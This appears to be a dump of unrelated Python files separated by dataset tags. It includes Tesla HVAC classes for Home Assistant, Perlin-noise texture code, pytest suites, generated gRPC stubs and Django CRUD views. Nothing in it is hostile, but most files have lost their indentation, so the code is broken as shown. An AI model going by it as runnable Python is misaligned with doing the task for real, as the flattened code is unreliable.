self.__is_auto_conditioning_on = False
self.__inside_temp = 0
self.__outside_temp = 0
self.__driver_temp_setting = 0
self.__passenger_temp_setting = 0
self.__is_climate_on = False
self.__fan_status = 0
self.__manual_update_time = 0
self.type = "HVAC (climate) system"
self.hass_type = "climate"
self.measurement = "C"
self.name = self._name()
self.uniq_name = self._uniq_name()
self.bin_type = 0x3
def is_hvac_enabled(self):
"""Return whether HVAC is running."""
return self.__is_climate_on
def get_current_temp(self):
"""Return vehicle inside temperature."""
return self.__inside_temp
def get_goal_temp(self):
"""Return driver set temperature."""
return self.__driver_temp_setting
def get_fan_status(self):
"""Return fan status."""
return self.__fan_status
async def async_update(self):
"""Update the HVAC state."""
await super().async_update()
data = self._controller.get_climate_params(self._id)
if data:
last_update = self._controller.get_last_update_time(self._id)
if last_update >= self.__manual_update_time:
self.__is_auto_conditioning_on = data["is_auto_conditioning_on"]
self.__is_climate_on = data["is_climate_on"]
self.__driver_temp_setting = (
data["driver_temp_setting"]
if data["driver_temp_setting"]
else self.__driver_temp_setting
)
self.__passenger_temp_setting = (
data["passenger_temp_setting"]
if data["passenger_temp_setting"]
else self.__passenger_temp_setting
)
self.__inside_temp = (
data["inside_temp"] if data["inside_temp"] else self.__inside_temp
)
self.__outside_temp = (
data["outside_temp"] if data["outside_temp"] else self.__outside_temp
)
self.__fan_status = data["fan_status"]
async def set_temperature(self, temp):
"""Set both the driver and passenger temperature to temp."""
temp = round(temp, 1)
self.__manual_update_time = time.time()
data = await self._controller.command(
self._id,
"set_temps",
{"driver_temp": temp, "passenger_temp": temp},
wake_if_asleep=True,
)
if data and data["response"]["result"]:
self.__driver_temp_setting = temp
self.__passenger_temp_setting = temp
async def set_status(self, enabled):
"""Enable or disable the HVAC."""
self.__manual_update_time = time.time()
if enabled:
data = await self._controller.command(
self._id, "auto_conditioning_start", wake_if_asleep=True
)
if data and data["response"]["result"]:
self.__is_auto_conditioning_on = True
self.__is_climate_on = True
else:
data = await self._controller.command(
self._id, "auto_conditioning_stop", wake_if_asleep=True
)
if data and data["response"]["result"]:
self.__is_auto_conditioning_on = False
self.__is_climate_on = False
await self.async_update()
@staticmethod
def has_battery():
"""Return whether the device has a battery."""
return False
class TempSensor(VehicleDevice):
"""Home-assistant class of temperature sensors for Tesla vehicles.
    This is intended to be partially inherited by a Home-Assistant entity.
"""
def __init__(self, data, controller):
"""Initialize the temperature sensors and track in celsius.
Vehicles have both a driver and passenger.
Parameters
----------
data : dict
The base state for a Tesla vehicle.
https://tesla-api.timdorr.com/vehicle/state/data
controller : teslajsonpy.Controller
The controller that controls updates to the Tesla API.
Returns
-------
None
"""
super().__init__(data, controller)
self.__inside_temp = 0
self.__outside_temp = 0
self.type = "temperature sensor"
self.measurement = "C"
self.hass_type = "sensor"
self._device_class: Text = "temperature"
self.name = self._name()
self.uniq_name = self._uniq_name()
self.bin_type = 0x4
def get_inside_temp(self):
"""Get inside temperature."""
return self.__inside_temp
def get_outside_temp(self):
"""Get outside temperature."""
return self.__outside_temp
async def async_update(self):
"""Update the temperature."""
await super().async_update()
data = self._controller.get_climate_params(self._id)
if data:
self.__inside_temp = (
data["inside_temp"] if data["inside_temp"] else self.__inside_temp
)
self.__outside_temp = (
data["outside_temp"] if data["outside_temp"] else self.__outside_temp
)
@staticmethod
def has_battery():
"""Return whether the device has a battery."""
return False
@property
def device_class(self) -> Text:
"""Return the HA device class."""
return self._device_class
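# --- Hedged usage sketch (not part of the original module) ---
# Kept as comments: it needs an authenticated teslajsonpy Controller and a
# vehicle data dict (placeholders here), and must run inside an event loop.
#
# climate = Climate(vehicle_data, controller)
# await climate.async_update()
# await climate.set_temperature(21.5)  # driver and passenger set to 21.5 C
# await climate.set_status(True)       # start auto conditioning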
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
import math
import random
class NoiseUtils:
def __init__(self, imageLen,imageWid):
self.imageLen=imageLen
self.imageWid=imageWid
self.gradientNumber = 256
self.grid = [[]]
self.gradients = []
self.permutations = []
self.img = {}
self.__generateGradientVectors()
self.__normalizeGradientVectors()
self.__generatePermutationsTable()
def __generateGradientVectors(self):
for i in range(self.gradientNumber):
while True:
x, y = random.uniform(-1, 1), random.uniform(-1, 1)
if x * x + y * y < 1:
self.gradients.append([x, y])
break
def __normalizeGradientVectors(self):
for i in range(self.gradientNumber):
x, y = self.gradients[i][0], self.gradients[i][1]
length = math.sqrt(x * x + y * y)
self.gradients[i] = [x / length, y / length]
# The modern version of the Fisher-Yates shuffle
def __generatePermutationsTable(self):
self.permutations = [i for i in range(self.gradientNumber)]
for i in reversed(range(self.gradientNumber)):
j = random.randint(0, i)
self.permutations[i], self.permutations[j] = \
self.permutations[j], self.permutations[i]
def getGradientIndex(self, x, y):
return self.permutations[(x + self.permutations[y % self.gradientNumber]) % self.gradientNumber]
def perlinNoise(self, x, y):
qx0 = int(math.floor(x))
qx1 = qx0 + 1
qy0 = int(math.floor(y))
qy1 = qy0 + 1
q00 = self.getGradientIndex(qx0, qy0)
q01 = self.getGradientIndex(qx1, qy0)
q10 = self.getGradientIndex(qx0, qy1)
q11 = self.getGradientIndex(qx1, qy1)
tx0 = x - math.floor(x)
tx1 = tx0 - 1
ty0 = y - math.floor(y)
ty1 = ty0 - 1
v00 = self.gradients[q00][0] * tx0 + self.gradients[q00][1] * ty0
v01 = self.gradients[q01][0] * tx1 + self.gradients[q01][1] * ty0
v10 = self.gradients[q10][0] * tx0 + self.gradients[q10][1] * ty1
v11 = self.gradients[q11][0] * tx1 + self.gradients[q11][1] * ty1
wx = tx0 * tx0 * (3 - 2 * tx0)
v0 = v00 + wx * (v01 - v00)
v1 = v10 + wx * (v11 - v10)
wy = ty0 * ty0 * (3 - 2 * ty0)
return (v0 + wy * (v1 - v0)) * 0.5 + 1
    def makeTexture(self, canshu1, canshu2, canshu3, texture=None):
        if texture is None:
            texture = self.wood  # only texture defined here; the original referenced a missing self.cloud
noise = {}
max = min = None
for i in range(self.imageLen):
for j in range(self.imageWid):
value = texture(i, j,canshu1,canshu2,canshu3,noise=None)
noise[i, j] = value
if max is None or max < value:
max = value
if min is None or min > value:
min = value
for i in range(self.imageLen):
for j in range(self.imageWid):
                self.img[i, j] = int((noise[i, j] - min) / (max - min) * 255)
def fractalBrownianMotion(self, x, y, func,octaves,persistence,canshu):
# octaves = 12
amplitude = 1.0
frequency = 1.0 / self.imageWid
# persistence = 0.5
value = 0.0
for k in range(octaves):
value += func(x * frequency, y * frequency) * amplitude
frequency *= canshu
amplitude *= persistence
return value
def wood(self, x, y,canshu1,canshu2,canshu3, noise = None):
if noise is None:
noise = self.perlinNoise
frequency = 1.0 / self.imageWid
n = noise(canshu1 * x * frequency, canshu2 * y * frequency) * canshu3
return n - int(n)
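# --- Hedged usage sketch (not part of the original module) ---
# Renders the wood texture to a grayscale PNG; assumes Pillow is installed.
def _example_wood_png(size=128):
    from PIL import Image
    noise = NoiseUtils(size, size)
    noise.makeTexture(30, 30, 4, texture=noise.wood)
    img = Image.new('L', (size, size))
    for x in range(size):
        for y in range(size):
            img.putpixel((x, y), noise.img[x, y])
    img.save('wood.png')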
|
nilq/baby-python
|
python
|
VERSION = '0.1.7'
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
from __future__ import print_function
from io import StringIO
from dktemplate.parse import nest
from dktemplate.tokenize import tokenize
class Render(object):
def __init__(self, content):
self.content = content
self.out = StringIO()
self.curlevel = 0
def value(self):
return self.out.getvalue()
def render(self, item=None):
if item is None:
item = self.content[0]
tag = item[0]
if tag.startswith('block:'):
tag = 'block'
#print '[I]', item, 'CALLING:', getattr(self, 'render_' + tag).__name__ , item
try:
getattr(self, 'render_' + tag)(item)
except:
print('='*80)
print(self.out.getvalue())
raise
def render_block(self, block):
print("{%% %s %%}" % block[0], file=self.out)
if len(block) > 1:
for item in block[1]:
self.render(item)
print("{%% end%s %%}" % block[0], file=self.out)
def render_tag(self, tag):
print("{%% %s %%}" % (' '.join(tag[1:])), file=self.out)
def render_val(self, item):
print("{{ %s }}" % item[1], file=self.out)
def render(txt, fname=None):
item = [nest(tokenize(txt), fname)]
r = Render("")
r.render(item)
return r.value()
|
nilq/baby-python
|
python
|
def findDuplicate(string):
    duplicates = []
    for ch in string:
        if ch not in duplicates and string.count(ch) > 1:
            duplicates.append(ch)
    return duplicates
n=input('Enter String : ')
print('Duplicate characters :',findDuplicate(n))
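# Example: findDuplicate('programming') -> ['r', 'g', 'm'] (order of first occurrence)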
|
nilq/baby-python
|
python
|
# Copyright 2020 Tyler Calder
import collections
import contextlib
import io
import unittest.mock
import os
import subprocess
import sys
import pytest
from pytest_mock import mocker
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), "..")))
import _realreq.realreq as realreq
CONTENT = """
import os
import requests
from foo import bar
from . import local_module
import local_module2
from foo.baz import frum
import abbrev
import src.local_module
"""
MOCK_ALIASES = {"abbrev": "abbreviation"}
realreq.ALIASES = MOCK_ALIASES
_MOCK_DEPENDENCY_TREE = {
"foo": ["bar"],
"requests": ["baz", "spam"],
"baz": [],
"spam": ["egg", "wheel"],
"egg": ["pip"],
"pip": [],
"wheel": [],
"abbreviation": [],
}
_MOCK_DEP_VERSIONS = {
"foo": "1.0.0",
"baz": "0.1.0",
"spam": "3.2.12",
"egg": "13.0",
"pip": "2.12.1",
"wheel": "1.1.1",
"notused": "201.10.1",
"DevDep": "0.1.1",
"testDep": "0.1.3",
"abbreviation": "1.2.1",
"requests": "0.2.0",
}
_DEEP_DEPENDENCIES = collections.OrderedDict(
[
("abbreviation", "1.2.1"),
("baz", "0.1.0"),
("egg", "13.0"),
("foo", "1.0.0"),
("pip", "2.12.1"),
("requests", "0.2.0"),
("spam", "3.2.12"),
("wheel", "1.1.1"),
]
)
_SHALLOW_DEPENDENCIES = collections.OrderedDict(
[
("abbreviation", "1.2.1"),
("foo", "1.0.0"),
("requests", "0.2.0"),
]
)
def mock_pip_show(*args, **kwargs):
pkg = args[0][2]
try:
deps = _MOCK_DEPENDENCY_TREE[pkg]
except KeyError:
raise subprocess.CalledProcessError(1, cmd="Test Command")
mock_result = unittest.mock.MagicMock()
mock_result.configure_mock(
**{
"stdout": "stuff\nRequires: {0}\nmore stuff".format(
", ".join(deps)
).encode()
}
)
return mock_result
def mock_pip_freeze(*args, **kwargs):
result = b"\n".join(
["{0}=={1}".format(k, v).encode() for k, v in _MOCK_DEP_VERSIONS.items()]
)
mock_result = unittest.mock.MagicMock()
mock_result.configure_mock(**{"stdout": result})
return mock_result
def mock_subprocess_run(*args, **kwargs):
"""Mock calls to subprocess by routing them to the right mock"""
command = args[0][1]
if command == "show":
return mock_pip_show(*args, **kwargs)
elif command == "freeze":
return mock_pip_freeze(*args, **kwargs)
@pytest.fixture(scope="session", params=["src", "path/to/src"])
def source_files(
tmp_path_factory,
request,
):
"""Creates a temp directory that tests different source files
returns: path to directory being used for test
"""
    path = os.path.normpath(request.param)
    paths = path.split("/")
    if len(paths) > 1:
        # nested layout: create the first directory, then the chain below it
        src = tmp_path_factory.mktemp(paths[0], numbered=False)
        for p in paths[1:]:
            src = src / p
            src.mkdir()
    else:
        src = tmp_path_factory.mktemp(path, numbered=False)
main = src / "main.py"
main.write_text(CONTENT)
return src
def test_search_source_for_used_packages(source_files):
"""Source code is searched and aquires the name of all packages used"""
pkgs = realreq._search_source(str(source_files))
expected = [
"requests",
"foo",
"local_module2",
"abbreviation",
]
assert set(pkgs) == set(expected)
def test_build_dependency_list(mocker):
"""Dependency Tree build out should identify all the dependencies a module has"""
# Essentially we want to make sure that the values returned from the system
# are what we would get by running `pip show x`, and then getting the "Requires" value
mock_run = mocker.patch("subprocess.run")
mock_run.side_effect = mock_pip_show
pkgs = ["requests", "foo", "local_module2", "abbreviation"]
dep_tree = realreq._build_dep_list(pkgs)
assert all([_ in dep_tree for _ in list(_MOCK_DEPENDENCY_TREE.keys())])
def test_get_dependency_versions(mocker):
"""Dependency Versions should return dictionary with packages and versions"""
mock_run = mocker.patch("subprocess.run")
mock_run.side_effect = mock_pip_freeze
pkgs = _MOCK_DEPENDENCY_TREE.keys()
versions = realreq._get_dependency_versions(pkgs)
assert versions == {
"foo": "1.0.0",
"baz": "0.1.0",
"spam": "3.2.12",
"egg": "13.0",
"pip": "2.12.1",
"wheel": "1.1.1",
"abbreviation": "1.2.1",
"requests": "0.2.0",
}
class TestCLI:
"""Tests for the CLI of realreq"""
@pytest.mark.parametrize("s_flag", ["-s", "--source"])
def test_default_flags(self, source_files, mocker, s_flag):
args = ["cmd", s_flag, str(source_files)]
mocker.patch.object(sys, "argv", args)
mock_run = mocker.patch("subprocess.run")
mock_run.side_effect = mock_subprocess_run
sbuff = io.StringIO()
with contextlib.redirect_stdout(sbuff):
app = realreq._RealReq()
app()
sbuff.seek(0)
assert sbuff.read() == "".join(
"{0}=={1}\n".format(k, v) for k, v in _SHALLOW_DEPENDENCIES.items()
)
@pytest.mark.parametrize("s_flag", ["-s", "--source"])
@pytest.mark.parametrize("d_flag", ["-d", "--deep"])
def test_deep_flag(self, source_files, mocker, s_flag, d_flag):
args = ["cmd", s_flag, str(source_files), d_flag]
mocker.patch.object(sys, "argv", args)
mock_run = mocker.patch("subprocess.run")
mock_run.side_effect = mock_subprocess_run
sbuff = io.StringIO()
with contextlib.redirect_stdout(sbuff):
app = realreq._RealReq()
app()
sbuff.seek(0)
assert sbuff.read() == "".join(
"{0}=={1}\n".format(k, v) for k, v in _DEEP_DEPENDENCIES.items()
)
|
nilq/baby-python
|
python
|
#!/usr/bin/env python
# -*- coding:UTF-8 -*-
'''
@Description: Utilities
@Author: Zpp
@Date: 2019-10-28 11:28:09
LastEditors: Zpp
LastEditTime: 2020-11-24 16:27:50
'''
import platform
def IsWindows():
return True if platform.system() == 'Windows' else False
def ReadFile(path, type='r'):
    try:
        with open(path, type) as f:
            return f.read()
    except:
        return False
def WriteFile(path, content, type='w'):
    try:
        with open(path, type) as f:
            f.write(content)
        return True
    except:
        return False
def health_database_status(s, sql):
is_db = True
try:
s.execute(sql)
except:
is_db = False
return is_db
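# --- Hedged usage sketch (not part of the original module) ---
if __name__ == '__main__':
    # paths are placeholders; both helpers return False on any I/O error
    if WriteFile('/tmp/demo.txt', 'hello'):
        print(ReadFile('/tmp/demo.txt'))
    print('Windows' if IsWindows() else 'not Windows')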
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
import pytest
import time
import zwutils.dlso as dlso
# pylint: disable=no-member
def test_dict2obj():
r = dlso.dict2obj({
'ks': 'v1',
'kn': 2,
'ka': [1, '2'],
'kd': {'1':1, '2':2},
'knone': None
})
r2 = dlso.dict2obj(None)
assert r.ks == 'v1'
def test_obj2dict():
o = type('', (), {})()
o.a1 = 'a'
o.a2 = 'b'
r = dlso.obj2dict(o)
assert r['a1'] == 'a'
def test_extend_attr():
b = {'a':'a', 'b':'b'}
e = {'b':'bb', 'c':'c', 'd':1}
o = dlso.extend_attrs(dlso.dict2obj(b), e)
assert o.b == 'bb' and o.c == 'c' and o.d == 1
o = dlso.extend_attrs(b, e)
assert o.b == 'bb' and o.c == 'c' and o.d == 1
o = dlso.extend_attrs(dlso.dict2obj(b), dlso.dict2obj(e))
assert o.b == 'bb' and o.c == 'c' and o.d == 1
o = dlso.extend_attrs(None, e)
assert o.b == 'bb' and o.c == 'c' and o.d == 1
o = dlso.extend_attrs(dlso.dict2obj(b), None)
assert o.a == 'a' and o.b == 'b'
def test_update_attrs():
b = {'a':'a', 'b':'b'}
e = {'b':'bb', 'c':'c'}
o = dlso.update_attrs(dlso.dict2obj(b), e)
assert o.b == 'bb' and not hasattr(o, 'c')
o = dlso.update_attrs(b, e)
assert o.b == 'bb' and not hasattr(o, 'c')
o = dlso.update_attrs(dlso.dict2obj(b), dlso.dict2obj(e))
assert o.b == 'bb' and not hasattr(o, 'c')
o = dlso.update_attrs(None, e)
assert not hasattr(o, 'b') and not hasattr(o, 'c')
o = dlso.update_attrs(dlso.dict2obj(b), None)
assert o.a == 'a' and o.b == 'b'
def test_upsert_config():
pcfg = type('', (), {})()
pcfg.a = 'o'
dcfg = {'a': 'd', 'da':'da', 'n1':{'nn1': {'nnn1': 'nnn1'}, 'nn2': 'nn2' } }
ncfg = {'a': 'n', 'na':'na'}
pmcfg = {'a': 'p','pa':'pa'}
cfg = dlso.upsert_config(pcfg, dcfg, ncfg, pmcfg)
assert id(cfg) == id(pcfg) and cfg.a == 'p' and hasattr(cfg, 'pa') and cfg.n1.nn1.nnn1 == 'nnn1'
def test_list_split():
r = dlso.list_split(list(range(11)), 3)
assert len(r) == 3
r = dlso.list_split(list(range(5)), 6)
assert len(r) == 5
def test_list_compare():
assert False == dlso.list_compare([1,2,3,3], [1,2,2,3])
assert True == dlso.list_compare([1,2,3], [2,1,3])
|
nilq/baby-python
|
python
|
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
import grpc
import environment.grpc.jobshop_pb2 as jobshop__pb2
class EnvironmentStub(object):
"""Missing associated documentation comment in .proto file"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.ApplyAction = channel.unary_unary(
'/env.Environment/ApplyAction',
request_serializer=jobshop__pb2.MasAction.SerializeToString,
response_deserializer=jobshop__pb2.MasActionResponse.FromString,
)
self.Reset = channel.unary_unary(
'/env.Environment/Reset',
request_serializer=jobshop__pb2.Empty.SerializeToString,
response_deserializer=jobshop__pb2.MasState.FromString,
)
self.Render = channel.unary_unary(
'/env.Environment/Render',
request_serializer=jobshop__pb2.Empty.SerializeToString,
response_deserializer=jobshop__pb2.Empty.FromString,
)
self.SetSeed = channel.unary_unary(
'/env.Environment/SetSeed',
request_serializer=jobshop__pb2.Seed.SerializeToString,
response_deserializer=jobshop__pb2.Empty.FromString,
)
self.Setup = channel.unary_unary(
'/env.Environment/Setup',
request_serializer=jobshop__pb2.SettingsMsg.SerializeToString,
response_deserializer=jobshop__pb2.SetupMsg.FromString,
)
class EnvironmentServicer(object):
"""Missing associated documentation comment in .proto file"""
def ApplyAction(self, request, context):
"""Apply an action to all agents
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Reset(self, request, context):
"""Reset the environment
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Render(self, request, context):
"""Show GUI
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def SetSeed(self, request, context):
"""Set the env seed
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Setup(self, request, context):
"""Set and get Settings
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_EnvironmentServicer_to_server(servicer, server):
rpc_method_handlers = {
'ApplyAction': grpc.unary_unary_rpc_method_handler(
servicer.ApplyAction,
request_deserializer=jobshop__pb2.MasAction.FromString,
response_serializer=jobshop__pb2.MasActionResponse.SerializeToString,
),
'Reset': grpc.unary_unary_rpc_method_handler(
servicer.Reset,
request_deserializer=jobshop__pb2.Empty.FromString,
response_serializer=jobshop__pb2.MasState.SerializeToString,
),
'Render': grpc.unary_unary_rpc_method_handler(
servicer.Render,
request_deserializer=jobshop__pb2.Empty.FromString,
response_serializer=jobshop__pb2.Empty.SerializeToString,
),
'SetSeed': grpc.unary_unary_rpc_method_handler(
servicer.SetSeed,
request_deserializer=jobshop__pb2.Seed.FromString,
response_serializer=jobshop__pb2.Empty.SerializeToString,
),
'Setup': grpc.unary_unary_rpc_method_handler(
servicer.Setup,
request_deserializer=jobshop__pb2.SettingsMsg.FromString,
response_serializer=jobshop__pb2.SetupMsg.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'env.Environment', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
# This class is part of an EXPERIMENTAL API.
class Environment(object):
"""Missing associated documentation comment in .proto file"""
@staticmethod
def ApplyAction(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/env.Environment/ApplyAction',
jobshop__pb2.MasAction.SerializeToString,
jobshop__pb2.MasActionResponse.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Reset(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/env.Environment/Reset',
jobshop__pb2.Empty.SerializeToString,
jobshop__pb2.MasState.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Render(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/env.Environment/Render',
jobshop__pb2.Empty.SerializeToString,
jobshop__pb2.Empty.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def SetSeed(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/env.Environment/SetSeed',
jobshop__pb2.Seed.SerializeToString,
jobshop__pb2.Empty.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def Setup(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/env.Environment/Setup',
jobshop__pb2.SettingsMsg.SerializeToString,
jobshop__pb2.SetupMsg.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
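# Hedged usage sketch (kept commented out so importing this generated module
# stays side-effect free; the server address is an assumption):
#
#     channel = grpc.insecure_channel('localhost:50051')
#     stub = EnvironmentStub(channel)
#     state = stub.Reset(jobshop__pb2.Empty())
#     response = stub.ApplyAction(jobshop__pb2.MasAction())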
|
nilq/baby-python
|
python
|
import os
class Config:
"""
Parent configuration class.
"""
DEBUG = False
TESTING = False
CSRF_ENABLED = True
SECRET = os.getenv('SECRET')
TITLE = "Test API"
VERSION = "1.0"
DESCRIPTION = "Demo API."
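# Hedged sketch of the usual companion pattern (an assumption -- these
# subclasses are not part of the original file): per-environment configs
# subclass Config and are selected by name in the app factory.
class DevelopmentConfig(Config):
    DEBUG = True

class TestingConfig(Config):
    TESTING = True

app_config = {
    'development': DevelopmentConfig,
    'testing': TestingConfig,
}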
|
nilq/baby-python
|
python
|
# coding=utf-8
from app.api.base.base_router import BaseRouter
from app.config.config import HEADER
from app.api.src.geo.provider import Provider
class GeoTypesRoute(BaseRouter):
def __init__(self):
super().__init__()
def get(self):
answer = Provider().get_types()
return answer, HEADER
def options(self):
return "OK", 200, {'Access-Control-Allow-Origin': '*',
'Access-Control-Allow-Methods': 'GET,POST,DELETE,PUT,OPTIONS',
'Access-Control-Allow-Headers': 'X-Requested-With,Content-Type'}
|
nilq/baby-python
|
python
|
from django.contrib.messages.views import SuccessMessageMixin
from django.contrib import messages
from django.http import HttpResponseRedirect
from django.views.generic import ListView, DetailView
from django.views.generic.edit import UpdateView, DeleteView, CreateView
from django.urls import reverse_lazy
from .forms import *
from django.db.models import Q
class FuncaoListView(ListView):
model = Funcao
template_name = 'funcao/funcao_list.html'
context_object_name = "funcoes"
paginate_by = 10
def get_queryset(self):
query = self.request.GET.get('search', None)
if query:
object_list = Funcao.objects.filter(
Q(nome_funcao__icontains=query) | Q(cbo__icontains=query)
)
else:
object_list = Funcao.objects.all()
return object_list
class FuncaoDetailView(DetailView):
model = Funcao
template_name = 'funcao/detail.html'
class FuncaoCreateView(SuccessMessageMixin, CreateView):
form_class = FuncaoForm
template_name = 'funcao/create.html'
success_url = reverse_lazy('public:funcao_create')
success_message = "Função cadastrada com sucesso!"
def form_valid(self, form):
self.object = form.save(commit=False)
self.object.idusuariocadastro = self.request.user.id
messages.success(self.request, self.success_message)  # note: previously obj.__dict__ was used, which printed the whole object
self.object.save()
return HttpResponseRedirect(self.get_success_url())
class FuncaoUpdateView(SuccessMessageMixin, UpdateView):
model = Funcao
form_class = FuncaoForm
template_name = 'funcao/edit.html'
success_url = reverse_lazy('public:funcao_list')
success_message = "Função Editada com sucesso!"
def form_valid(self, form):
self.object = form.save(commit=False)
self.object.idusuarioedicao = self.request.user.id
messages.success(self.request, self.success_message)  # note: previously obj.__dict__ was used, which printed the whole object
self.object.save()
return HttpResponseRedirect(self.get_success_url())
class FuncaoDeleteView(SuccessMessageMixin, DeleteView):
model = Funcao
template_name = 'funcao/delete.html'
success_url = reverse_lazy('public:funcao_list')
success_message = "A função %s foi apagada com sucesso!"
def delete(self, request, *args, **kwargs):
obj = self.get_object()
messages.success(self.request, self.success_message % obj.nome_funcao)  # note: previously obj.__dict__ was used, which printed the whole object
return super(FuncaoDeleteView, self).delete(request, *args, **kwargs)
################################################## EMPRESA ####################################################
class EmpresaListView(ListView):
model = Empresa
template_name = 'empresa/empresa_list.html'
context_object_name = "empresas"
paginate_by = 10
def get_queryset(self):
query = self.request.GET.get('search', None)
if query:
object_list = Empresa.objects.filter(
Q(nome_empresa__icontains=query) | Q(cnpj__icontains=query)
)
else:
object_list = Empresa.objects.all()
return object_list
class EmpresaCreateView(SuccessMessageMixin, CreateView):
form_class = EmpresaForm
template_name = 'empresa/create.html'
success_url = reverse_lazy('public:empresa_create')
success_message = "Empresa cadastrada com sucesso!"
def form_valid(self, form):
self.object = form.save(commit=False)
self.object.idusuariocadastro = self.request.user.id
messages.success(self.request, self.success_message)  # note: previously obj.__dict__ was used, which printed the whole object
self.object.save()
return HttpResponseRedirect(self.get_success_url())
class EmpresaDetailView(DetailView):
model = Empresa
template_name = 'empresa/detail.html'
class EmpresaUpdateView(SuccessMessageMixin, UpdateView):
model = Empresa
form_class = EmpresaForm
template_name = 'empresa/edit.html'
success_url = reverse_lazy('public:empresa_list')
success_message = "Empresa Editada com sucesso!"
def form_valid(self, form):
self.object = form.save(commit=False)
self.object.idusuarioedicao = self.request.user.id
messages.success(self.request, self.success_message)  # note: previously obj.__dict__ was used, which printed the whole object
self.object.save()
return HttpResponseRedirect(self.get_success_url())
class EmpresaDeleteView(SuccessMessageMixin, DeleteView):
model = Empresa
template_name = 'empresa/delete.html'
success_url = reverse_lazy('public:empresa_list')
success_message = "A Empresa %s foi apagada com sucesso!"
def delete(self, request, *args, **kwargs):
obj = self.get_object()
messages.success(self.request, self.success_message % obj.nome_empresa)  # note: previously obj.__dict__ was used, which printed the whole object
return super(EmpresaDeleteView, self).delete(request, *args, **kwargs)
################################################## PACIENTE ####################################################
class PacienteListView(ListView):
model = Paciente
template_name = 'paciente/paciente_list.html'
context_object_name = "pacientes"
paginate_by = 10
def get_queryset(self):
query = self.request.GET.get('search', None)
if query:
object_list = Paciente.objects.filter(
Q(nome_paciente__icontains=query) | Q(cpf__icontains=query)
)
else:
object_list = Paciente.objects.all()
return object_list
class PacienteCreateView(SuccessMessageMixin, CreateView):
form_class = PacienteForm
template_name = 'paciente/create.html'
success_url = reverse_lazy('public:paciente_create')
success_message = "Paciente cadastrado com sucesso!"
def form_valid(self, form):
self.object = form.save(commit=False)
self.object.idusuariocadastro = self.request.user.id
messages.success(self.request, self.success_message)  # note: previously obj.__dict__ was used, which printed the whole object
self.object.save()
return HttpResponseRedirect(self.get_success_url())
class PacienteDetailView(DetailView):
model = Paciente
template_name = 'paciente/detail.html'
class PacienteUpdateView(SuccessMessageMixin, UpdateView):
model = Paciente
form_class = PacienteForm
template_name = 'paciente/edit.html'
success_url = reverse_lazy('public:paciente_list')
success_message = "Paciente Editado com sucesso!"
def form_valid(self, form):
self.object = form.save(commit=False)
self.object.idusuarioedicao = self.request.user.id
messages.success(self.request, self.success_message)  # note: previously obj.__dict__ was used, which printed the whole object
self.object.save()
return HttpResponseRedirect(self.get_success_url())
class PacienteDeleteView(SuccessMessageMixin, DeleteView):
model = Paciente
template_name = 'paciente/delete.html'
success_url = reverse_lazy('public:paciente_list')
success_message ="O Paciente %s foi apagada com sucesso!"
def delete(self, request, *args, **kwargs):
obj = self.get_object()
messages.success(self.request, self.success_message % obj.nome_paciente)  # note: previously obj.__dict__ was used, which printed the whole object
return super(PacienteDeleteView, self).delete(request, *args, **kwargs)
################################################## exame ####################################################
class ExameListView(ListView):
model = Exame
template_name = 'exame/exame_list.html'
context_object_name = "exames"
paginate_by = 10
def get_queryset(self):
query = self.request.GET.get('search', None)
if query:
object_list = Exame.objects.filter(
Q(nome_exame__icontains=query)
)
else:
object_list = Exame.objects.all()
return object_list
class ExameCreateView(SuccessMessageMixin, CreateView):
form_class = ExameForm
template_name = 'exame/create.html'
success_url = reverse_lazy('public:exame_create')
success_message = "Exame cadastrado com sucesso!"
# def moeda(valor):
# print(valor)
# valor = valor.replace('.', '')
# valor = valor.replace(',', '.')
# return Decimal(valor)
# return valor
def form_valid(self, form):
# print('aki 2')
# self.valor_colaborador = 6.0
#self.valor_ems = 12.00
self.object = form.save(commit=False)
# print(self.object.valor_colaborador)
# self.object.valor_exame = ExameCreateView.moeda(self.object.valor_colaborador)
self.object.idusuariocadastro = self.request.user.id
messages.success(self.request, self.success_message)  # note: previously obj.__dict__ was used, which printed the whole object
self.object.save()
return HttpResponseRedirect(self.get_success_url())
class ExameDetailView(DetailView):
model = Exame
template_name = 'exame/detail.html'
class ExameUpdateView(SuccessMessageMixin, UpdateView):
model = Exame
form_class = ExameForm
